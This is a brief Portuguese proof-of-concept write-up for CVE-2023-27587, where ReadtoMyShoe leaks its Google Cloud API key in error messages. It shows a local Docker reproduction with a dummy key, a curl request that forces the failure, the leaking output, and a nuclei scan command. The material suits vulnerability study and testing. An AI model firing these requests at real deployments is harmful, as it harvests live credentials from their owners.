
O PoC simples do CVE-2023-27587
O PoC simples da CVE-2023-27587
ReadtoMyShoe (RTMS) é uma aplicação web (rust, yew e axum) que permite carregar artigos (através de URL ou colando diretamente) e ouvi-los mais tarde.
Se ocorrer um erro ao adicionar um artigo, o site mostra ao usuário uma mensagem de erro. Se o erro se originar da requisição do Google Cloud TTS, a mensagem incluirá o URL completo da requisição. O URL da requisição contém a chave da API do Google Cloud.
$ git clone https://github.com/rozbb/readtomyshoe.git
$ cd readtomyshoe && git checkout v0.2.0
$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
$ docker run -p 9382:9382 readtomyshoe-vul
A chave só é exposta quando ocorre um erro na chamada GCP!
curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
-H 'Accept-Encoding: gzip, deflate' \
-H 'content-type: application/json' \
--data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'
TTS failed: TTS request failed
Caused by:
HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)

$ nuclei -t cves/2023/CVE-2023-27587.yaml -u http://<host>
